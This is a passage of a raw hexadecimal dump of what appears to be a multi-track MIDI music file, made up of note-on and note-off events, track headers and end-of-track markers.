40\n00 90 4c 40 3c 80 4c 40 00 90 4a 40 81 70 80 4a 40 78 90 49 40 78 80 49 40 00 90 4e 40 78 80 4e 40 00 90 4e 40 78 80 4e\n40 00 90 4e 40 78 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 4c 40 82 68 80 4c 40 00 90 4a 40 3c 80\n4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 83 60 80 4a 40 00 90 49 40 81 70 80 49 40 00 90 4e 40 81 70 80 4e 40 00 90 4c\n40 81 70 80 4c 40 00 90 4c 40 81 34 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00\n90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00\n90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4a 40 3c 80 4a 40 00\n90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40 84 58 80 4b 40 00 90 44 40 78\n80 44 40 00 90 49 40 78 80 49 40 00 90 49 40 78 80 49 40 00 90 49 40 78 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c\n80 45 40 00 90 47 40 83 60 80 47 40 00 90 45 40 81 70 80 45 40 00 90 44 40 81 70 80 44 40 81 70 90 4b 40 83 60 80 4b 40\n00 90 4a 40 81 70 80 4a 40 00 90 4e 40 81 70 80 4e 40 00 90 4d 40 81 70 80 4d 40 00 90 4c 40 81 70 80 4c 40 00 90 4b 40\n3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40\n3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 49 40\n3c 80 49 40 00 90 4b 40 3c 80 4b 40 00 90 49 40 3c 80 49 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 49 40\n3c 80 49 40 00 90 48 40 81 70 80 48 40 00 90 47 40 81 70 80 47 40 00 90 46 40 81 70 80 46 40 00 90 45 40 81 70 80 45 40\n00 90 44 40 81 70 80 44 40 89 30 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 85 50 80 4b 40 00 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 78 90 49 40 3c 80 49 40 00 90 4b 40 3c 80 4b 40\n00 90 4c 40 78 80 4c 40 00 90 4e 40 78 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40\n00 90 51 40 3c 80 51 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 50 40 3c 80 50 40\n00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 50 40 3c 80 50 40 00 90 4e 40 3c 80 4e 40\n00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 
80 4b 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40\n00 90 4c 40 3c 80 4c 40 00 90 4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40\n00 90 4c 40 3c 80 4c 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00 90 4c 40 3c 80 4c 40\n00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40\n00 90 47 40 3c 80 47 40 00 90 49 40 3c 80 49 40 00 90 4a 40 3c 80 4a 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40\n00 90 45 40 3c 80 45 40 00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c 80 45 40 00 90 47 40 3c 80 47 40\n00 90 49 40 3c 80 49 40 00 90 47 40 3c 80 47 40 00 90 45 40 3c 80 45 40 00 90 44 40 3c 80 44 40 00 90 47 40 3c 80 47 40\n00 90 45 40 81 70 80 45 40 81 70 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 81 70 80 4c 40 00 90 4b\n40 84 58 80 4b 40 00 90 49 40 78 80 49 40 00 90 50 40 78 80 50 40 00 90 50 40 78 80 50 40 00 90 50 40 78 80 50 40 00 90\n4e 40 3c 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4e 40 81 70 80 4e 40 00 90 4c 40 83 60 80 4c 40 00 90 4b 40 81 70 80 4b\n40 00 90 4f 40 81 70 80 4f 40 00 90 4e 40 81 70 80 4e 40 00 90 42 40 81 70 80 42 40 00 90 41 40 81 70 80 41 40 00 90 45\n40 81 70 80 45 40 00 90 44 40 78 80 44 40 83 60 90 48 40 78 80 48 40 00 90 4e 40 78 80 4e 40 00 90 4e 40 78 80 4e 40 00\n90 4e 40 78 80 4e 40 00 90 4c 40 3c 80 4c 40 00 90 4b 40 3c 80 4b 40 00 90 4c 40 78 80 4c 40 00 90 4b 40 3c 80 4b 40 00\n90 49 40 3c 80 49 40 00 90 4b 40 78 80 4b 40 00 90 48 40 78 80 48 40 00 90 49 40 85 50 80 49 40 00 90 48 40 81 70 80 48\n40 00 90 47 40 81 70 80 47 40 00 90 46 40 81 70 80 46 40 00 90 45 40 81 70 80 45 40 00 90 44 40 83 60 80 44 40 00 90 46\n40 81 70 80 46 40 00 90 48 40 81 70 80 48 40 00 90 49 40 83 60 80 49 40 00 90 48 40 81 70 80 48 40 00 90 4c 40 83 60 80\n4c 40 00 90 4b 40 78 80 4b 40 00 90 49 40 78 80 49 40 00 90 48 40 81 70 80 48 40 00 90 49 40 83 60 80 49 40 00 90 48 40\n81 70 80 48 40 00 90 49 40 8f 00 80 49 40 77 90 00 00 00 ff 2f 00 4d 54 72 6b 00 00 09 40 ab 10 91 44 40 81 70 81 44 40\n00 91 41 40 81 70 81 41 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 42 40 83 60 81 42 40 00 91 49 40\n83 60 81 49 40 00 91 47 40 83 60 81 47 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 45 40 82 68 81 45\n40 00 91 44 40 78 81 44 40 00 91 42 40 78 81 42 40 00 91 40 40 78 81 40 40 00 91 3f 40 81 70 81 3f 40 00 91 44 40 81 70\n81 44 40 00 91 44 40 81 70 81 44 40 00 91 43 40 81 70 81 43 40 00 91 44 40 81 70 81 44 40 00 91 3b 40 81 70 81 3b 40 00\n91 3d 40 82 68 81 3d 40 00 91 3d 40 78 81 3d 40 00 91 3f 40 78 81 3f 40 00 91 3d 40 78 81 3d 40 00 91 3f 40 78 81 3f 40\n00 91 41 40 78 81 41 40 00 91 42 40 81 70 81 42 40 00 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 3c 91 47 40 3c\n81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 42 40 78 81 42 40 00 91 45 40 78 81 45 40 00 91 44 40 78\n81 44 40 00 91 42 40 78 81 42 40 00 91 41 40 81 70 81 41 40 00 91 42 40 82 68 81 42 40 00 91 40 40 84 58 81 40 40 00 91\n3f 40 81 70 81 3f 40 00 91 40 40 84 58 81 40 40 00 91 3f 40 78 81 3f 40 00 91 40 40 78 81 40 40 00 91 42 40 3c 81 42 40\n00 91 44 40 3c 81 44 40 00 91 42 40 81 70 81 42 40 00 91 47 40 82 68 81 47 40 00 91 49 40 78 81 49 40 00 91 47 40 78 81\n47 40 00 91 45 40 78 81 45 40 00 91 44 40 81 70 81 44 40 a1 60 91 49 40 81 70 81 49 40 00 91 48 40 81 70 81 48 40 00 91\n4c 40 81 70 81 4c 40 00 91 4b 40 85 50 81 4b 40 00 91 49 40 83 60 81 49 40 00 91 48 
40 78 81 48 40 00 91 47 40 81 34 81\n47 40 00 91 47 40 3c 81 47 40 00 91 49 40 3c 81 49 40 00 91 4a 40 3c 81 4a 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81\n47 40 00 91 45 40 3c 81 45 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 47 40 3c 81\n47 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 47 40 3c 81\n47 40 00 91 45 40 82 2c 81 45 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45 40 3c 81 45 40 00 91 44 40 81\n70 81 44 40 87 40 91 45 40 81 70 81 45 40 00 91 44 40 81 70 81 44 40 00 91 49 40 81 70 81 49 40 00 91 47 40 84 58 81 47\n40 00 91 40 40 78 81 40 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 44 40 3c 81 44\n40 00 91 42 40 3c 81 42 40 00 91 44 40 82 68 81 44 40 00 91 3d 40 3c 81 3d 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 78 81\n40 40 00 91 42 40 78 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81\n45 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81\n42 40 00 91 40 40 3c 81 40 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81\n40 40 00 91 3f 40 3c 81 3f 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 3c 81\n40 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 3d 40 3c 81 3d 40 00 91 40 40 3c 81\n40 40 00 91 3f 40 3c 81 3f 40 00 91 3d 40 3c 81 3d 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 3c 81 40 40 00 91 3e 40 3c 81\n3e 40 00 91 3d 40 3c 81 3d 40 00 91 3b 40 3c 81 3b 40 00 91 3e 40 3c 81 3e 40 00 91 3d 40 3c 81 3d 40 00 91 3b 40 3c 81\n3b 40 00 91 3d 40 3c 81 3d 40 00 91 3e 40 3c 81 3e 40 00 91 3d 40 3c 81 3d 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81\n3f 40 00 91 3d 40 3c 81 3d 40 00 91 48 40 81 70 81 48 40 00 91 3d 40 81 70 81 3d 40 00 91 3f 40 78 81 3f 40 00 91 3f 40\n78 81 3f 40 00 91 44 40 3c 81 44 40 00 91 46 40 3c 81 46 40 00 91 47 40 81 70 81 47 40 00 91 46 40 78 81 46 40 00 91 4b\n40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49\n40 83 60 81 49 40 00 91 47 40 81 70 81 47 40 00 91 46 40 81 70 81 46 40 00 91 45 40 82 68 81 45 40 00 91 3f 40 78 81 3f\n40 00 91 44 40 78 81 44 40 00 91 44 40 81 70 81 44 40 00 91 42 40 3c 81 42 40 00 91 41 40 3c 81 41 40 00 91 42 40 83 60\n81 42 40 00 91 40 40 81 70 81 40 40 00 91 3f 40 81 70 81 3f 40 00 91 3d 40 81 70 81 3d 40 00 91 3f 40 83 60 81 3f 40 84\n58 91 44 40 78 81 44 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 48 40 3c 81 48 40\n00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 3c 81 4b 40 00 91 48 40 3c 81 48 40\n00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40\n00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40\n00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40\n00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 47 40 3c 81 47 40\n00 91 49 40 3c 81 49 40 00 91 4b 40 3c 81 4b 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 78 81 4b 40\n8b 20 91 42 40 78 81 42 40 00 91 47 40 78 81 47 40 00 91 47 40 78 81 47 40 00 91 47 40 78 81 47 40 00 91 45 40 3c 81 45\n40 00 91 
44 40 3c 81 44 40 00 91 45 40 81 70 81 45 40 00 91 44 40 84 1c 81 44 40 00 91 44 40 3c 81 44 40 00 91 42 40 3c\n81 42 40 00 91 41 40 3c 81 41 40 00 91 42 40 81 70 81 42 40 00 91 44 40 82 2c 81 44 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 45 40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 44 40 3c 81 44 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 45\n40 3c 81 45 40 00 91 44 40 3c 81 44 40 00 91 45 40 3c 81 45 40 00 91 42 40 3c 81 42 40 00 91 44 40 82 68 81 44 40 00 91\n49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49 40 82 68 81 49 40 00 91 46 40 78 81 46 40 00 91 4b 40 78 81 4b 40 00\n91 4b 40 78 81 4b 40 00 91 4b 40 78 81 4b 40 00 91 49 40 3c 81 49 40 00 91 47 40 3c 81 47 40 00 91 49 40 81 70 81 49 40\n00 91 47 40 81 70 81 47 40 00 91 47 40 81 70 81 47 40 00 91 46 40 81 70 81 46 40 00 91 4a 40 81 70 81 4a 40 00 91 49 40\n83 60 81 49 40 78 91 44 40 78 81 44 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 49 40 78 81 49 40 00 91 48\n40 3c 81 48 40 00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 3c 81 49 40 00 91 4b 40 81 70 81 4b 40 00 91\n49 40 3c 81 49 40 00 91 48 40 3c 81 48 40 00 91 49 40 81 70 81 49 40 00 91 42 40 81 70 81 42 40 00 91 44 40 83 60 81 44\n40 00 91 42 40 82 68 81 42 40 82 68 91 44 40 78 81 44 40 00 91 42 40 3c 81 42 40 00 91 40 40 3c 81 40 40 00 91 42 40 78\n81 42 40 00 91 42 40 78 81 42 40 00 91 42 40 78 81 42 40 00 91 40 40 3c 81 40 40 00 91 3f 40 3c 81 3f 40 00 91 40 40 82\n68 81 40 40 00 91 42 40 3c 81 42 40 00 91 44 40 3c 81 44 40 00 91 45 40 78 81 45 40 00 91 44 40 81 70 81 44 40 00 91 40\n40 78 81 40 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 45 40 78 81 45 40 00 91 44 40 3c 81 44 40 00 91 42\n40 3c 81 42 40 00 91 44 40 78 81 44 40 00 91 46 40 3c 81 46 40 00 91 48 40 3c 81 48 40 00 91 49 40 81 70 81 49 40 00 91\n46 40 81 70 81 46 40 00 91 44 40 81 70 81 44 40 00 91 44 40 85 50 81 44 40 00 91 44 40 81 70 81 44 40 00 91 42 40 81 70\n81 42 40 00 91 41 40 81 70 81 41 40 00 91 45 40 81 70 81 45 40 00 91 44 40 87 40 81 44 40 77 90 00 00 00 ff 2f 00 4d 54\n72 6b 00 00 08 ba 98 30 92 3d 40 81 70 82 3d 40 00 92 3c 40 81 70 82 3c 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 83 60\n82 3f 40 00 92 3d 40 81 70 82 3d 40 00 92 42 40 82 68 82 42 40 00 92 40 40 78 82 40 40 00 92 3f 40 78 82 3f 40 00 92 3d\n40 78 82 3d 40 00 92 3d 40 81 70 82 3d 40 00 92 3b 40 81 70 82 3b 40 00 92 3d 40 81 70 82 3d 40 00 92 42 40 82 68 82 42\n40 00 92 40 40 78 82 40 40 00 92 3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3f 40 81 70 82 3f 40 00 92 44 40 81 70\n82 44 40 78 92 45 40 78 82 45 40 00 92 44 40 78 82 44 40 00 92 42 40 78 82 42 40 00 92 41 40 78 82 41 40 00 92 3d 40 78\n82 3d 40 00 92 42 40 81 70 82 42 40 00 92 40 40 85 50 82 40 40 00 92 44 40 81 70 82 44 40 00 92 46 40 81 70 82 46 40 92\n60 92 3d 40 81 70 82 3d 40 00 92 3c 40 81 70 82 3c 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 83 60 82 3f 40 00 92 3d 40\n87 40 82 3d 40 00 92 36 40 78 82 36 40 00 92 38 40 78 82 38 40 00 92 3a 40 78 82 3a 40 00 92 3b 40 78 82 3b 40 00 92 3d\n40 83 60 82 3d 40 81 70 92 40 40 81 70 82 40 40 00 92 3f 40 81 70 82 3f 40 00 92 44 40 81 70 82 44 40 00 92 42 40 83 60\n82 42 40 00 92 40 40 81 70 82 40 40 8b 20 92 44 40 81 70 82 44 40 00 92 43 40 81 70 82 43 40 00 92 47 40 81 70 82 47 40\n00 92 46 40 84 58 82 46 40 00 92 3f 40 78 82 3f 40 00 92 44 40 82 68 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82\n40 40 00 92 42 40 82 68 82 42 40 00 92 40 40 3c 82 40 
40 00 92 42 40 3c 82 42 40 00 92 44 40 89 30 82 44 40 8c 18 92 3d\n40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 41 40 3c 82 41 40 00 92 3f\n40 3c 82 3f 40 00 92 41 40 81 70 82 41 40 00 92 42 40 78 82 42 40 00 92 36 40 3c 82 36 40 00 92 38 40 3c 82 38 40 00 92\n39 40 78 82 39 40 00 92 3b 40 78 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92\n39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92\n39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92\n40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92\n3d 40 3c 82 3d 40 00 92 3e 40 3c 82 3e 40 00 92 40 40 3c 82 40 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 3c 82 3b 40 00 92 3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92\n3e 40 3c 82 3e 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 3d 40 3c 82 3d 40 00 92\n3b 40 83 60 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92 36 40 3c 82 36 40 00 92 34 40 3c 82 34 40 00\n92 33 40 3c 82 33 40 00 92 31 40 3c 82 31 40 00 92 30 40 3c 82 30 40 00 92 31 40 3c 82 31 40 00 92 33 40 81 70 82 33 40\n8e 08 92 31 40 78 82 31 40 00 92 36 40 78 82 36 40 00 92 36 40 78 82 36 40 00 92 36 40 78 82 36 40 00 92 34 40 3c 82 34\n40 00 92 33 40 3c 82 33 40 00 92 34 40 81 70 82 34 40 00 92 37 40 81 70 82 37 40 00 92 38 40 81 70 82 38 40 00 92 35 40\n78 82 35 40 87 40 92 33 40 78 82 33 40 00 92 38 40 78 82 38 40 00 92 38 40 78 82 38 40 00 92 38 40 78 82 38 40 00 92 36\n40 3c 82 36 40 00 92 34 40 3c 82 34 40 00 92 36 40 82 2c 82 36 40 00 92 39 40 3c 82 39 40 00 92 38 40 3c 82 38 40 00 92\n36 40 3c 82 36 40 00 92 35 40 3c 82 35 40 00 92 33 40 3c 82 33 40 00 92 35 40 3c 82 35 40 00 92 31 40 3c 82 31 40 00 92\n36 40 3c 82 36 40 00 92 35 40 3c 82 35 40 00 92 36 40 3c 82 36 40 00 92 38 40 3c 82 38 40 00 92 39 40 3c 82 39 40 00 92\n38 40 3c 82 38 40 00 92 39 40 3c 82 39 40 00 92 3b 40 3c 82 3b 40 00 92 3d 40 3c 82 3d 40 00 92 3c 40 3c 82 3c 40 00 92\n3d 40 3c 82 3d 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92\n42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 45 40 3c 82 45 40 00 92\n44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92\n40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92\n3f 40 3c 82 3f 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 3c 82 40 40 00 92\n42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 3d 40 3c 82 3d 40 00 92 40 40 3c 82 40 40 00 92\n3f 40 81 70 82 3f 40 91 68 92 38 40 78 82 38 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d 40\n00 92 3c 40 3c 82 3c 40 00 92 3a 40 3c 82 3a 40 00 92 3c 40 81 70 82 3c 40 00 92 3d 40 83 60 82 3d 
40 00 92 3b 40 82 68\n82 3b 40 00 92 42 40 78 82 42 40 00 92 41 40 81 70 82 41 40 00 92 42 40 81 70 82 42 40 00 92 3b 40 81 70 82 3b 40 00 92\n3d 40 84 1c 82 3d 40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 3c 82 3b 40 00 92 39 40 3c 82 39 40 00 92 38 40 83 60 82 38 40\n93 58 92 3b 40 78 82 3b 40 00 92 40 40 78 82 40 40 00 92 40 40 78 82 40 40 00 92 40 40 78 82 40 40 00 92 3e 40 3c 82 3e\n40 00 92 3d 40 3c 82 3d 40 00 92 3b 40 81 70 82 3b 40 78 92 3d 40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82\n42 40 00 92 42 40 78 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f 40 00 92 40 40 81 70 82 40 40 00 92 42 40 83\n24 82 42 40 00 92 44 40 3c 82 44 40 00 92 45 40 78 82 45 40 00 92 44 40 3c 82 44 40 00 92 42 40 3c 82 42 40 00 92 44 40\n78 82 44 40 00 92 42 40 3c 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 81 70 82 3f 40 00 92 40 40 83 60 82 40 40 00 92\n3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3f 40 78 82 3f 40 00 92 41 40 3c 82 41 40 00 92 42 40 3c 82 42 40 00 92\n44 40 78 82 44 40 00 92 44 40 78 82 44 40 78 92 3d 40 78 82 3d 40 00 92 3f 40 78 82 3f 40 00 92 3d 40 78 82 3d 40 00 92\n3c 40 81 70 82 3c 40 00 92 3d 40 83 60 82 3d 40 00 92 3f 40 81 70 82 3f 40 00 92 3d 40 78 82 3d 40 00 92 3d 40 78 82 3d\n40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92 40 40 3c 82 40 40 00 92 3f 40 3c 82 3f\n40 00 92 40 40 78 82 40 40 00 92 42 40 3c 82 42 40 00 92 44 40 3c 82 44 40 00 92 46 40 81 70 82 46 40 00 92 3f 40 83 60\n82 3f 40 00 92 40 40 81 70 82 40 40 00 92 3f 40 82 68 82 3f 40 00 92 40 40 3c 82 40 40 00 92 42 40 3c 82 42 40 00 92 41\n40 78 82 41 40 00 92 3d 40 83 60 82 3d 40 00 92 3d 40 78 82 3d 40 00 92 42 40 78 82 42 40 00 92 42 40 78 82 42 40 00 92\n42 40 81 70 82 42 40 00 92 41 40 78 82 41 40 00 92 3f 40 78 82 3f 40 00 92 41 40 83 60 82 41 40 77 90 00 00 00 ff 2f 00\n4d 54 72 6b 00 00 07 ac 8b 20 93 38 40 83 60 83 38 40 00 93 37 40 81 70 83 37 40 00 93 3b 40 81 70 83 3b 40 00 93 3a 40\n83 60 83 3a 40 00 93 38 40 81 70 83 38 40 00 93 39 40 82 68 83 39 40 00 93 38 40 3c 83 38 40 00 93 36 40 3c 83 36 40 00\n93 38 40 78 83 38 40 00 93 3d 40 78 83 3d 40 00 93 36 40 78 83 36 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00\n93 3b 40 82 68 83 3b 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 38 40 81 70 83 38\n40 00 93 36 40 78 83 36 40 00 93 34 40 78 83 34 40 00 93 33 40 82 68 83 33 40 00 93 32 40 78 83 32 40 00 93 31 40 87 40\n83 31 40 90 70 93 38 40 81 70 83 38 40 00 93 37 40 81 70 83 37 40 00 93 3b 40 81 70 83 3b 40 00 93 3a 40 83 60 83 3a 40\n00 93 38 40 78 83 38 40 00 93 39 40 78 83 39 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00 93 35 40 81 70 83 35\n40 00 93 39 40 81 70 83 39 40 00 93 38 40 83 60 83 38 40 00 93 36 40 84 58 83 36 40 00 93 38 40 3c 83 38 40 00 93 36 40\n3c 83 36 40 00 93 34 40 78 83 34 40 00 93 36 40 3c 83 36 40 00 93 38 40 3c 83 38 40 00 93 39 40 78 83 39 40 00 93 36 40\n78 83 36 40 00 93 38 40 81 70 83 38 40 00 93 31 40 89 30 83 31 40 00 93 36 40 81 70 83 36 40 00 93 34 40 78 83 34 40 00\n93 33 40 78 83 33 40 00 93 34 40 78 83 34 40 00 93 36 40 78 83 36 40 00 93 38 40 78 83 38 40 00 93 36 40 78 83 36 40 00\n93 38 40 78 83 38 40 00 93 39 40 78 83 39 40 00 93 3b 40 89 30 83 3b 40 00 93 3d 40 81 70 83 3d 40 00 93 3c 40 81 70 83\n3c 40 00 93 40 40 81 70 83 40 40 00 93 3f 40 83 60 83 3f 40 00 93 3d 40 84 58 83 3d 40 00 93 3b 40 78 83 3b 40 00 93 3a\n40 78 83 3a 40 00 93 38 40 81 70 83 38 40 00 93 37 40 3c 83 37 40 00 93 35 40 3c 83 35 40 00 93 37 40 81 70 83 37 40 00\n93 38 40 3c 83 38 40 00 
93 3a 40 3c 83 3a 40 00 93 38 40 3c 83 38 40 00 93 37 40 3c 83 37 40 00 93 38 40 3c 83 38 40 00\n93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 38 40 3c 83 38 40 00 93 39 40 3c 83 39 40 00 93 3b 40 3c 83 3b 40 00\n93 39 40 3c 83 39 40 00 93 38 40 3c 83 38 40 00 93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 3d 40 3c 83 3d 40 00\n93 3a 40 3c 83 3a 40 00 93 3b 40 3c 83 3b 40 00 93 3d 40 3c 83 3d 40 00 93 3b 40 3c 83 3b 40 00 93 3a 40 3c 83 3a 40 00\n93 3c 40 3c 83 3c 40 00 93 3d 40 3c 83 3d 40 00 93 3f 40 3c 83 3f 40 00 93 3c 40 3c 83 3c 40 00 93 3d 40 83 60 83 3d 40\n98 30 93 36 40 81 70 83 36 40 00 93 35 40 81 70 83 35 40 00 93 39 40 81 70 83 39 40 00 93 38 40 83 60 83 38 40 00 93 36\n40 83 60 83 36 40 93 58 93 38 40 78 83 38 40 00 93 3d 40 78 83 3d 40 00 93 3d 40 78 83 3d 40 00 93 3d 40 78 83 